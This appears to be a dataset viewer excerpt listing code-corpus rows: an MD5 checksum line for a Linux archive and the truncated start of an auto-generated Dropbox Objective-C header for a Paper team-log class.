armada370-linux-3.x.txz MD5 763fb17ed51739d662a60a6a51e981af
| {
"pile_set_name": "Github"
} |
///
/// Copyright (c) 2016 Dropbox, Inc. All rights reserved.
///
/// Auto-generated by Stone, do not modify.
///
#import <Foundation/Foundation.h>
#import "DBSerializableProtocol.h"
@class DBTEAMLOGPaperContentAddToFolderDetails;
NS_ASSUME_NONNULL_BEGIN
#pragma mark - API Object
///
/// The `PaperContentAddToFol... | {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.